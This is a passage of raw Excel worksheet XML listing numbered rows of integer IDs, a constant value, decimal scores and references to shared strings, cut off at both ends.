      <c r="A5269" s="1">
        <v>5267</v>
      </c>
      <c r="B5269">
        <v>7014</v>
      </c>
      <c r="C5269">
        <v>7014</v>
      </c>
      <c r="D5269">
        <v>3</v>
      </c>
      <c r="E5269">
        <v>0.47220000624656677</v>
      </c>
      <c r="F5269" t="s">
        <v>10120</v>
      </c>
      <c r="G5269" t="s">
        <v>10417</v>
      </c>
      <c r="H5269" t="s">
        <v>10418</v>
      </c>
    </row>
    <row r="5270" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5270" s="1">
        <v>5268</v>
      </c>
      <c r="B5270">
        <v>6976</v>
      </c>
      <c r="C5270">
        <v>6976</v>
      </c>
      <c r="D5270">
        <v>3</v>
      </c>
      <c r="E5270">
        <v>0.61729997396469116</v>
      </c>
      <c r="F5270" t="s">
        <v>10120</v>
      </c>
      <c r="G5270" t="s">
        <v>10419</v>
      </c>
      <c r="H5270" t="s">
        <v>10420</v>
      </c>
    </row>
    <row r="5271" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5271" s="1">
        <v>5269</v>
      </c>
      <c r="B5271">
        <v>7011</v>
      </c>
      <c r="C5271">
        <v>7011</v>
      </c>
      <c r="D5271">
        <v>3</v>
      </c>
      <c r="E5271">
        <v>0.59839999675750732</v>
      </c>
      <c r="F5271" t="s">
        <v>10120</v>
      </c>
      <c r="G5271" t="s">
        <v>10421</v>
      </c>
      <c r="H5271" t="s">
        <v>10422</v>
      </c>
    </row>
    <row r="5272" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5272" s="1">
        <v>5270</v>
      </c>
      <c r="B5272">
        <v>7007</v>
      </c>
      <c r="C5272">
        <v>7007</v>
      </c>
      <c r="D5272">
        <v>3</v>
      </c>
      <c r="E5272">
        <v>0.74390000104904175</v>
      </c>
      <c r="F5272" t="s">
        <v>10120</v>
      </c>
      <c r="G5272" t="s">
        <v>10423</v>
      </c>
      <c r="H5272" t="s">
        <v>10424</v>
      </c>
    </row>
    <row r="5273" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5273" s="1">
        <v>5271</v>
      </c>
      <c r="B5273">
        <v>7875</v>
      </c>
      <c r="C5273">
        <v>7875</v>
      </c>
      <c r="D5273">
        <v>3</v>
      </c>
      <c r="E5273">
        <v>0.61510002613067627</v>
      </c>
      <c r="F5273" t="s">
        <v>10120</v>
      </c>
      <c r="G5273" t="s">
        <v>10425</v>
      </c>
      <c r="H5273" t="s">
        <v>10426</v>
      </c>
    </row>
    <row r="5274" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5274" s="1">
        <v>5272</v>
      </c>
      <c r="B5274">
        <v>7006</v>
      </c>
      <c r="C5274">
        <v>7006</v>
      </c>
      <c r="D5274">
        <v>3</v>
      </c>
      <c r="E5274">
        <v>0.99879997968673706</v>
      </c>
      <c r="F5274" t="s">
        <v>10120</v>
      </c>
      <c r="G5274" t="s">
        <v>10427</v>
      </c>
      <c r="H5274" t="s">
        <v>10428</v>
      </c>
    </row>
    <row r="5275" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5275" s="1">
        <v>5273</v>
      </c>
      <c r="B5275">
        <v>6028</v>
      </c>
      <c r="C5275">
        <v>6028</v>
      </c>
      <c r="D5275">
        <v>3</v>
      </c>
      <c r="E5275">
        <v>0.91060000658035278</v>
      </c>
      <c r="F5275" t="s">
        <v>10120</v>
      </c>
      <c r="G5275" t="s">
        <v>10429</v>
      </c>
      <c r="H5275" t="s">
        <v>10430</v>
      </c>
    </row>
    <row r="5276" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5276" s="1">
        <v>5274</v>
      </c>
      <c r="B5276">
        <v>7097</v>
      </c>
      <c r="C5276">
        <v>7097</v>
      </c>
      <c r="D5276">
        <v>3</v>
      </c>
      <c r="E5276">
        <v>0.53090000152587891</v>
      </c>
      <c r="F5276" t="s">
        <v>10120</v>
      </c>
      <c r="G5276" t="s">
        <v>10431</v>
      </c>
      <c r="H5276" t="s">
        <v>10432</v>
      </c>
    </row>
    <row r="5277" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5277" s="1">
        <v>5275</v>
      </c>
      <c r="B5277">
        <v>6349</v>
      </c>
      <c r="C5277">
        <v>6349</v>
      </c>
      <c r="D5277">
        <v>3</v>
      </c>
      <c r="E5277">
        <v>0.59219998121261597</v>
      </c>
      <c r="F5277" t="s">
        <v>10120</v>
      </c>
      <c r="G5277" t="s">
        <v>10433</v>
      </c>
      <c r="H5277" t="s">
        <v>10434</v>
      </c>
    </row>
    <row r="5278" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5278" s="1">
        <v>5276</v>
      </c>
      <c r="B5278">
        <v>5677</v>
      </c>
      <c r="C5278">
        <v>5677</v>
      </c>
      <c r="D5278">
        <v>3</v>
      </c>
      <c r="E5278">
        <v>0.46520000696182251</v>
      </c>
      <c r="F5278" t="s">
        <v>10120</v>
      </c>
      <c r="G5278" t="s">
        <v>10435</v>
      </c>
      <c r="H5278" t="s">
        <v>10436</v>
      </c>
    </row>
    <row r="5279" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5279" s="1">
        <v>5277</v>
      </c>
      <c r="B5279">
        <v>7878</v>
      </c>
      <c r="C5279">
        <v>7878</v>
      </c>
      <c r="D5279">
        <v>3</v>
      </c>
      <c r="E5279">
        <v>0.81879997253417969</v>
      </c>
      <c r="F5279" t="s">
        <v>10120</v>
      </c>
      <c r="G5279" t="s">
        <v>10437</v>
      </c>
      <c r="H5279" t="s">
        <v>10438</v>
      </c>
    </row>
    <row r="5280" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5280" s="1">
        <v>5278</v>
      </c>
      <c r="B5280">
        <v>6395</v>
      </c>
      <c r="C5280">
        <v>6395</v>
      </c>
      <c r="D5280">
        <v>3</v>
      </c>
      <c r="E5280">
        <v>0.55769997835159302</v>
      </c>
      <c r="F5280" t="s">
        <v>10120</v>
      </c>
      <c r="G5280" t="s">
        <v>10439</v>
      </c>
      <c r="H5280" t="s">
        <v>10440</v>
      </c>
    </row>
    <row r="5281" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5281" s="1">
        <v>5279</v>
      </c>
      <c r="B5281">
        <v>7823</v>
      </c>
      <c r="C5281">
        <v>7823</v>
      </c>
      <c r="D5281">
        <v>3</v>
      </c>
      <c r="E5281">
        <v>0.69800001382827759</v>
      </c>
      <c r="F5281" t="s">
        <v>10120</v>
      </c>
      <c r="G5281" t="s">
        <v>10441</v>
      </c>
      <c r="H5281" t="s">
        <v>10442</v>
      </c>
    </row>
    <row r="5282" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5282" s="1">
        <v>5280</v>
      </c>
      <c r="B5282">
        <v>5992</v>
      </c>
      <c r="C5282">
        <v>5992</v>
      </c>
      <c r="D5282">
        <v>3</v>
      </c>
      <c r="E5282">
        <v>0.9473000168800354</v>
      </c>
      <c r="F5282" t="s">
        <v>10120</v>
      </c>
      <c r="G5282" t="s">
        <v>10443</v>
      </c>
      <c r="H5282" t="s">
        <v>10444</v>
      </c>
    </row>
    <row r="5283" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5283" s="1">
        <v>5281</v>
      </c>
      <c r="B5283">
        <v>6956</v>
      </c>
      <c r="C5283">
        <v>6956</v>
      </c>
      <c r="D5283">
        <v>3</v>
      </c>
      <c r="E5283">
        <v>0.50900000333786011</v>
      </c>
      <c r="F5283" t="s">
        <v>10120</v>
      </c>
      <c r="G5283" t="s">
        <v>10445</v>
      </c>
      <c r="H5283" t="s">
        <v>10446</v>
      </c>
    </row>
    <row r="5284" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5284" s="1">
        <v>5282</v>
      </c>
      <c r="B5284">
        <v>6023</v>
      </c>
      <c r="C5284">
        <v>6023</v>
      </c>
      <c r="D5284">
        <v>3</v>
      </c>
      <c r="E5284">
        <v>0.5526999831199646</v>
      </c>
      <c r="F5284" t="s">
        <v>10120</v>
      </c>
      <c r="G5284" t="s">
        <v>10447</v>
      </c>
      <c r="H5284" t="s">
        <v>10448</v>
      </c>
    </row>
    <row r="5285" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5285" s="1">
        <v>5283</v>
      </c>
      <c r="B5285">
        <v>7030</v>
      </c>
      <c r="C5285">
        <v>7030</v>
      </c>
      <c r="D5285">
        <v>3</v>
      </c>
      <c r="E5285">
        <v>0.56400001049041748</v>
      </c>
      <c r="F5285" t="s">
        <v>10120</v>
      </c>
      <c r="G5285" t="s">
        <v>10449</v>
      </c>
      <c r="H5285" t="s">
        <v>10450</v>
      </c>
    </row>
    <row r="5286" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5286" s="1">
        <v>5284</v>
      </c>
      <c r="B5286">
        <v>6412</v>
      </c>
      <c r="C5286">
        <v>6412</v>
      </c>
      <c r="D5286">
        <v>3</v>
      </c>
      <c r="E5286">
        <v>0.77899998426437378</v>
      </c>
      <c r="F5286" t="s">
        <v>10120</v>
      </c>
      <c r="G5286" t="s">
        <v>10451</v>
      </c>
      <c r="H5286" t="s">
        <v>10452</v>
      </c>
    </row>
    <row r="5287" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5287" s="1">
        <v>5285</v>
      </c>
      <c r="B5287">
        <v>6327</v>
      </c>
      <c r="C5287">
        <v>6327</v>
      </c>
      <c r="D5287">
        <v>3</v>
      </c>
      <c r="E5287">
        <v>0.9035000205039978</v>
      </c>
      <c r="F5287" t="s">
        <v>10120</v>
      </c>
      <c r="G5287" t="s">
        <v>10453</v>
      </c>
      <c r="H5287" t="s">
        <v>10454</v>
      </c>
    </row>
    <row r="5288" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5288" s="1">
        <v>5286</v>
      </c>
      <c r="B5288">
        <v>6951</v>
      </c>
      <c r="C5288">
        <v>6951</v>
      </c>
      <c r="D5288">
        <v>3</v>
      </c>
      <c r="E5288">
        <v>0.63429999351501465</v>
      </c>
      <c r="F5288" t="s">
        <v>10120</v>
      </c>
      <c r="G5288" t="s">
        <v>10455</v>
      </c>
      <c r="H5288" t="s">
        <v>10456</v>
      </c>
    </row>
    <row r="5289" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5289" s="1">
        <v>5287</v>
      </c>
      <c r="B5289">
        <v>5953</v>
      </c>
      <c r="C5289">
        <v>5953</v>
      </c>
      <c r="D5289">
        <v>3</v>
      </c>
      <c r="E5289">
        <v>0.99330002069473267</v>
      </c>
      <c r="F5289" t="s">
        <v>10120</v>
      </c>
      <c r="G5289" t="s">
        <v>10457</v>
      </c>
      <c r="H5289" t="s">
        <v>10458</v>
      </c>
    </row>
    <row r="5290" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5290" s="1">
        <v>5288</v>
      </c>
      <c r="B5290">
        <v>6441</v>
      </c>
      <c r="C5290">
        <v>6441</v>
      </c>
      <c r="D5290">
        <v>3</v>
      </c>
      <c r="E5290">
        <v>0.99809998273849487</v>
      </c>
      <c r="F5290" t="s">
        <v>10120</v>
      </c>
      <c r="G5290" t="s">
        <v>10459</v>
      </c>
      <c r="H5290" t="s">
        <v>10460</v>
      </c>
    </row>
    <row r="5291" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5291" s="1">
        <v>5289</v>
      </c>
      <c r="B5291">
        <v>5669</v>
      </c>
      <c r="C5291">
        <v>5669</v>
      </c>
      <c r="D5291">
        <v>3</v>
      </c>
      <c r="E5291">
        <v>0.63249999284744263</v>
      </c>
      <c r="F5291" t="s">
        <v>10120</v>
      </c>
      <c r="G5291" t="s">
        <v>10461</v>
      </c>
      <c r="H5291" t="s">
        <v>10462</v>
      </c>
    </row>
    <row r="5292" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5292" s="1">
        <v>5290</v>
      </c>
      <c r="B5292">
        <v>6022</v>
      </c>
      <c r="C5292">
        <v>6022</v>
      </c>
      <c r="D5292">
        <v>3</v>
      </c>
      <c r="E5292">
        <v>0.98909997940063477</v>
      </c>
      <c r="F5292" t="s">
        <v>10120</v>
      </c>
      <c r="G5292" t="s">
        <v>10463</v>
      </c>
      <c r="H5292" t="s">
        <v>10464</v>
      </c>
    </row>
    <row r="5293" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5293" s="1">
        <v>5291</v>
      </c>
      <c r="B5293">
        <v>6335</v>
      </c>
      <c r="C5293">
        <v>6335</v>
      </c>
      <c r="D5293">
        <v>3</v>
      </c>
      <c r="E5293">
        <v>0.49770000576972961</v>
      </c>
      <c r="F5293" t="s">
        <v>10120</v>
      </c>
      <c r="G5293" t="s">
        <v>10465</v>
      </c>
      <c r="H5293" t="s">
        <v>10466</v>
      </c>
    </row>
    <row r="5294" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5294" s="1">
        <v>5292</v>
      </c>
      <c r="B5294">
        <v>5991</v>
      </c>
      <c r="C5294">
        <v>5991</v>
      </c>
      <c r="D5294">
        <v>3</v>
      </c>
      <c r="E5294">
        <v>0.61489999294281006</v>
      </c>
      <c r="F5294" t="s">
        <v>10120</v>
      </c>
      <c r="G5294" t="s">
        <v>10467</v>
      </c>
      <c r="H5294" t="s">
        <v>10468</v>
      </c>
    </row>
    <row r="5295" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5295" s="1">
        <v>5293</v>
      </c>
      <c r="B5295">
        <v>6954</v>
      </c>
      <c r="C5295">
        <v>6954</v>
      </c>
      <c r="D5295">
        <v>3</v>
      </c>
      <c r="E5295">
        <v>0.71200001239776611</v>
      </c>
      <c r="F5295" t="s">
        <v>10120</v>
      </c>
      <c r="G5295" t="s">
        <v>10469</v>
      </c>
      <c r="H5295" t="s">
        <v>10470</v>
      </c>
    </row>
    <row r="5296" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5296" s="1">
        <v>5294</v>
      </c>
      <c r="B5296">
        <v>7843</v>
      </c>
      <c r="C5296">
        <v>7843</v>
      </c>
      <c r="D5296">
        <v>3</v>
      </c>
      <c r="E5296">
        <v>0.85519999265670776</v>
      </c>
      <c r="F5296" t="s">
        <v>10120</v>
      </c>
      <c r="G5296" t="s">
        <v>10471</v>
      </c>
      <c r="H5296" t="s">
        <v>10472</v>
      </c>
    </row>
    <row r="5297" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5297" s="1">
        <v>5295</v>
      </c>
      <c r="B5297">
        <v>5671</v>
      </c>
      <c r="C5297">
        <v>5671</v>
      </c>
      <c r="D5297">
        <v>3</v>
      </c>
      <c r="E5297">
        <v>0.91579997539520264</v>
      </c>
      <c r="F5297" t="s">
        <v>10120</v>
      </c>
      <c r="G5297" t="s">
        <v>10473</v>
      </c>
      <c r="H5297" t="s">
        <v>10474</v>
      </c>
    </row>
    <row r="5298" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5298" s="1">
        <v>5296</v>
      </c>
      <c r="B5298">
        <v>6927</v>
      </c>
      <c r="C5298">
        <v>6927</v>
      </c>
      <c r="D5298">
        <v>3</v>
      </c>
      <c r="E5298">
        <v>0.74430000782012939</v>
      </c>
      <c r="F5298" t="s">
        <v>10120</v>
      </c>
      <c r="G5298" t="s">
        <v>10475</v>
      </c>
      <c r="H5298" t="s">
        <v>10476</v>
      </c>
    </row>
    <row r="5299" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5299" s="1">
        <v>5297</v>
      </c>
      <c r="B5299">
        <v>7093</v>
      </c>
      <c r="C5299">
        <v>7093</v>
      </c>
      <c r="D5299">
        <v>3</v>
      </c>
      <c r="E5299">
        <v>0.61360001564025879</v>
      </c>
      <c r="F5299" t="s">
        <v>10120</v>
      </c>
      <c r="G5299" t="s">
        <v>10477</v>
      </c>
      <c r="H5299" t="s">
        <v>10478</v>
      </c>
    </row>
    <row r="5300" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5300" s="1">
        <v>5298</v>
      </c>
      <c r="B5300">
        <v>7059</v>
      </c>
      <c r="C5300">
        <v>7059</v>
      </c>
      <c r="D5300">
        <v>3</v>
      </c>
      <c r="E5300">
        <v>0.50690001249313354</v>
      </c>
      <c r="F5300" t="s">
        <v>10120</v>
      </c>
      <c r="G5300" t="s">
        <v>10479</v>
      </c>
      <c r="H5300" t="s">
        <v>10480</v>
      </c>
    </row>
    <row r="5301" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5301" s="1">
        <v>5299</v>
      </c>
      <c r="B5301">
        <v>7094</v>
      </c>
      <c r="C5301">
        <v>7094</v>
      </c>
      <c r="D5301">
        <v>3</v>
      </c>
      <c r="E5301">
        <v>0.80470001697540283</v>
      </c>
      <c r="F5301" t="s">
        <v>10120</v>
      </c>
      <c r="G5301" t="s">
        <v>10481</v>
      </c>
      <c r="H5301" t="s">
        <v>10482</v>
      </c>
    </row>
    <row r="5302" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5302" s="1">
        <v>5300</v>
      </c>
      <c r="B5302">
        <v>6031</v>
      </c>
      <c r="C5302">
        <v>6031</v>
      </c>
      <c r="D5302">
        <v>3</v>
      </c>
      <c r="E5302">
        <v>0.62070000171661377</v>
      </c>
      <c r="F5302" t="s">
        <v>10120</v>
      </c>
      <c r="G5302" t="s">
        <v>10483</v>
      </c>
      <c r="H5302" t="s">
        <v>10484</v>
      </c>
    </row>
    <row r="5303" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5303" s="1">
        <v>5301</v>
      </c>
      <c r="B5303">
        <v>6437</v>
      </c>
      <c r="C5303">
        <v>6437</v>
      </c>
      <c r="D5303">
        <v>3</v>
      </c>
      <c r="E5303">
        <v>0.99199998378753662</v>
      </c>
      <c r="F5303" t="s">
        <v>10120</v>
      </c>
      <c r="G5303" t="s">
        <v>10485</v>
      </c>
      <c r="H5303" t="s">
        <v>10486</v>
      </c>
    </row>
    <row r="5304" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5304" s="1">
        <v>5302</v>
      </c>
      <c r="B5304">
        <v>6410</v>
      </c>
      <c r="C5304">
        <v>6410</v>
      </c>
      <c r="D5304">
        <v>3</v>
      </c>
      <c r="E5304">
        <v>0.44850000739097601</v>
      </c>
      <c r="F5304" t="s">
        <v>10120</v>
      </c>
      <c r="G5304" t="s">
        <v>10487</v>
      </c>
      <c r="H5304" t="s">
        <v>10488</v>
      </c>
    </row>
    <row r="5305" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5305" s="1">
        <v>5303</v>
      </c>
      <c r="B5305">
        <v>6426</v>
      </c>
      <c r="C5305">
        <v>6426</v>
      </c>
      <c r="D5305">
        <v>3</v>
      </c>
      <c r="E5305">
        <v>0.94580000638961792</v>
      </c>
      <c r="F5305" t="s">
        <v>10120</v>
      </c>
      <c r="G5305" t="s">
        <v>10489</v>
      </c>
      <c r="H5305" t="s">
        <v>10490</v>
      </c>
    </row>
    <row r="5306" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5306" s="1">
        <v>5304</v>
      </c>
      <c r="B5306">
        <v>5857</v>
      </c>
      <c r="C5306">
        <v>5857</v>
      </c>
      <c r="D5306">
        <v>3</v>
      </c>
      <c r="E5306">
        <v>0.93690001964569092</v>
      </c>
      <c r="F5306" t="s">
        <v>10120</v>
      </c>
      <c r="G5306" t="s">
        <v>10491</v>
      </c>
      <c r="H5306" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="5307" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5307" s="1">
        <v>5305</v>
      </c>
      <c r="B5307">
        <v>7131</v>
      </c>
      <c r="C5307">
        <v>7131</v>
      </c>
      <c r="D5307">
        <v>3</v>
      </c>
      <c r="E5307">
        <v>0.60509997606277466</v>
      </c>
      <c r="F5307" t="s">
        <v>10120</v>
      </c>
      <c r="G5307" t="s">
        <v>10493</v>
      </c>
      <c r="H5307" t="s">
        <v>10494</v>
      </c>
    </row>
    <row r="5308" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5308" s="1">
        <v>5306</v>
      </c>
      <c r="B5308">
        <v>6687</v>
      </c>
      <c r="C5308">
        <v>6687</v>
      </c>
      <c r="D5308">
        <v>3</v>
      </c>
      <c r="E5308">
        <v>0.47749999165534968</v>
      </c>
      <c r="F5308" t="s">
        <v>10120</v>
      </c>
      <c r="G5308" t="s">
        <v>10495</v>
      </c>
      <c r="H5308" t="s">
        <v>10496</v>
      </c>
    </row>
    <row r="5309" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5309" s="1">
        <v>5307</v>
      </c>
      <c r="B5309">
        <v>7472</v>
      </c>
      <c r="C5309">
        <v>7472</v>
      </c>
      <c r="D5309">
        <v>3</v>
      </c>
      <c r="E5309">
        <v>0.99049997329711914</v>
      </c>
      <c r="F5309" t="s">
        <v>10120</v>
      </c>
      <c r="G5309" t="s">
        <v>10497</v>
      </c>
      <c r="H5309" t="s">
        <v>10498</v>
      </c>
    </row>
    <row r="5310" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5310" s="1">
        <v>5308</v>
      </c>
      <c r="B5310">
        <v>7469</v>
      </c>
      <c r="C5310">
        <v>7469</v>
      </c>
      <c r="D5310">
        <v>3</v>
      </c>
      <c r="E5310">
        <v>0.91060000658035278</v>
      </c>
      <c r="F5310" t="s">
        <v>10120</v>
      </c>
      <c r="G5310" t="s">
        <v>10499</v>
      </c>
      <c r="H5310" t="s">
        <v>10500</v>
      </c>
    </row>
    <row r="5311" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5311" s="1">
        <v>5309</v>
      </c>
      <c r="B5311">
        <v>5801</v>
      </c>
      <c r="C5311">
        <v>5801</v>
      </c>
      <c r="D5311">
        <v>3</v>
      </c>
      <c r="E5311">
        <v>0.98180001974105835</v>
      </c>
      <c r="F5311" t="s">
        <v>10120</v>
      </c>
      <c r="G5311" t="s">
        <v>10501</v>
      </c>
      <c r="H5311" t="s">
        <v>10502</v>
      </c>
    </row>
    <row r="5312" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5312" s="1">
        <v>5310</v>
      </c>
      <c r="B5312">
        <v>7467</v>
      </c>
      <c r="C5312">
        <v>7467</v>
      </c>
      <c r="D5312">
        <v>3</v>
      </c>
      <c r="E5312">
        <v>0.99540001153945923</v>
      </c>
      <c r="F5312" t="s">
        <v>10120</v>
      </c>
      <c r="G5312" t="s">
        <v>10503</v>
      </c>
      <c r="H5312" t="s">
        <v>10504</v>
      </c>
    </row>
    <row r="5313" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5313" s="1">
        <v>5311</v>
      </c>
      <c r="B5313">
        <v>7292</v>
      </c>
      <c r="C5313">
        <v>7292</v>
      </c>
      <c r="D5313">
        <v>3</v>
      </c>
      <c r="E5313">
        <v>0.94929999113082886</v>
      </c>
      <c r="F5313" t="s">
        <v>10120</v>
      </c>
      <c r="G5313" t="s">
        <v>10505</v>
      </c>
      <c r="H5313" t="s">
        <v>10506</v>
      </c>
    </row>
    <row r="5314" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5314" s="1">
        <v>5312</v>
      </c>
      <c r="B5314">
        <v>6015</v>
      </c>
      <c r="C5314">
        <v>6015</v>
      </c>
      <c r="D5314">
        <v>3</v>
      </c>
      <c r="E5314">
        <v>0.61809998750686646</v>
      </c>
      <c r="F5314" t="s">
        <v>10120</v>
      </c>
      <c r="G5314" t="s">
        <v>10507</v>
      </c>
      <c r="H5314" t="s">
        <v>10508</v>
      </c>
    </row>
    <row r="5315" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5315" s="1">
        <v>5313</v>
      </c>
      <c r="B5315">
        <v>6693</v>
      </c>
      <c r="C5315">
        <v>6693</v>
      </c>
      <c r="D5315">
        <v>3</v>
      </c>
      <c r="E5315">
        <v>0.98710000514984131</v>
      </c>
      <c r="F5315" t="s">
        <v>10120</v>
      </c>
      <c r="G5315" t="s">
        <v>10509</v>
      </c>
      <c r="H5315" t="s">
        <v>10510</v>
      </c>
    </row>
    <row r="5316" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5316" s="1">
        <v>5314</v>
      </c>
      <c r="B5316">
        <v>6792</v>
      </c>
      <c r="C5316">
        <v>6792</v>
      </c>
      <c r="D5316">
        <v>3</v>
      </c>
      <c r="E5316">
        <v>0.91920000314712524</v>
      </c>
      <c r="F5316" t="s">
        <v>10120</v>
      </c>
      <c r="G5316" t="s">
        <v>10511</v>
      </c>
      <c r="H5316" t="s">
        <v>10512</v>
      </c>
    </row>
    <row r="5317" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5317" s="1">
        <v>5315</v>
      </c>
      <c r="B5317">
        <v>6206</v>
      </c>
      <c r="C5317">
        <v>6206</v>
      </c>
      <c r="D5317">
        <v>3</v>
      </c>
      <c r="E5317">
        <v>0.99529999494552612</v>
      </c>
      <c r="F5317" t="s">
        <v>10120</v>
      </c>
      <c r="G5317" t="s">
        <v>10513</v>
      </c>
      <c r="H5317" t="s">
        <v>10514</v>
      </c>
    </row>
    <row r="5318" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5318" s="1">
        <v>5316</v>
      </c>
      <c r="B5318">
        <v>7460</v>
      </c>
      <c r="C5318">
        <v>7460</v>
      </c>
      <c r="D5318">
        <v>3</v>
      </c>
      <c r="E5318">
        <v>0.83950001001358032</v>
      </c>
      <c r="F5318" t="s">
        <v>10120</v>
      </c>
      <c r="G5318" t="s">
        <v>10515</v>
      </c>
      <c r="H5318" t="s">
        <v>10516</v>
      </c>
    </row>
    <row r="5319" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5319" s="1">
        <v>5317</v>
      </c>
      <c r="B5319">
        <v>7459</v>
      </c>
      <c r="C5319">
        <v>7459</v>
      </c>
      <c r="D5319">
        <v>3</v>
      </c>
      <c r="E5319">
        <v>0.70599997043609619</v>
      </c>
      <c r="F5319" t="s">
        <v>10120</v>
      </c>
      <c r="G5319" t="s">
        <v>10517</v>
      </c>
      <c r="H5319" t="s">
        <v>10518</v>
      </c>
    </row>
    <row r="5320" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5320" s="1">
        <v>5318</v>
      </c>
      <c r="B5320">
        <v>7456</v>
      </c>
      <c r="C5320">
        <v>7456</v>
      </c>
      <c r="D5320">
        <v>3</v>
      </c>
      <c r="E5320">
        <v>0.78320002555847168</v>
      </c>
      <c r="F5320" t="s">
        <v>10120</v>
      </c>
      <c r="G5320" t="s">
        <v>10519</v>
      </c>
      <c r="H5320" t="s">
        <v>10520</v>
      </c>
    </row>
    <row r="5321" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5321" s="1">
        <v>5319</v>
      </c>
      <c r="B5321">
        <v>7452</v>
      </c>
      <c r="C5321">
        <v>7452</v>
      </c>
      <c r="D5321">
        <v>3</v>
      </c>
      <c r="E5321">
        <v>0.52020001411437988</v>
      </c>
      <c r="F5321" t="s">
        <v>10120</v>
      </c>
      <c r="G5321" t="s">
        <v>10521</v>
      </c>
      <c r="H5321" t="s">
        <v>10522</v>
      </c>
    </row>
    <row r="5322" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5322" s="1">
        <v>5320</v>
      </c>
      <c r="B5322">
        <v>7288</v>
      </c>
      <c r="C5322">
        <v>7288</v>
      </c>
      <c r="D5322">
        <v>3</v>
      </c>
      <c r="E5322">
        <v>0.86470001935958862</v>
      </c>
      <c r="F5322" t="s">
        <v>10120</v>
      </c>
      <c r="G5322" t="s">
        <v>10523</v>
      </c>
      <c r="H5322" t="s">
        <v>10524</v>
      </c>
    </row>
    <row r="5323" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5323" s="1">
        <v>5321</v>
      </c>
      <c r="B5323">
        <v>7451</v>
      </c>
      <c r="C5323">
        <v>7451</v>
      </c>
      <c r="D5323">
        <v>3</v>
      </c>
      <c r="E5323">
        <v>0.83099997043609619</v>
      </c>
      <c r="F5323" t="s">
        <v>10120</v>
      </c>
      <c r="G5323" t="s">
        <v>10525</v>
      </c>
      <c r="H5323" t="s">
        <v>10526</v>
      </c>
    </row>
    <row r="5324" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5324" s="1">
        <v>5322</v>
      </c>
      <c r="B5324">
        <v>7446</v>
      </c>
      <c r="C5324">
        <v>7446</v>
      </c>
      <c r="D5324">
        <v>3</v>
      </c>
      <c r="E5324">
        <v>0.98100000619888306</v>
      </c>
      <c r="F5324" t="s">
        <v>10120</v>
      </c>
      <c r="G5324" t="s">
        <v>10527</v>
      </c>
      <c r="H5324" t="s">
        <v>10528</v>
      </c>
    </row>
    <row r="5325" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5325" s="1">
        <v>5323</v>
      </c>
      <c r="B5325">
        <v>6698</v>
      </c>
      <c r="C5325">
        <v>6698</v>
      </c>
      <c r="D5325">
        <v>3</v>
      </c>
      <c r="E5325">
        <v>0.4724000096321106</v>
      </c>
      <c r="F5325" t="s">
        <v>10120</v>
      </c>
      <c r="G5325" t="s">
        <v>10529</v>
      </c>
      <c r="H5325" t="s">
        <v>10530</v>
      </c>
    </row>
    <row r="5326" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5326" s="1">
        <v>5324</v>
      </c>
      <c r="B5326">
        <v>6152</v>
      </c>
      <c r="C5326">
        <v>6152</v>
      </c>
      <c r="D5326">
        <v>3</v>
      </c>
      <c r="E5326">
        <v>0.99330002069473267</v>
      </c>
      <c r="F5326" t="s">
        <v>10120</v>
      </c>
      <c r="G5326" t="s">
        <v>10531</v>
      </c>
      <c r="H5326" t="s">
        <v>10532</v>
      </c>
    </row>
    <row r="5327" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5327" s="1">
        <v>5325</v>
      </c>
      <c r="B5327">
        <v>5885</v>
      </c>
      <c r="C5327">
        <v>5885</v>
      </c>
      <c r="D5327">
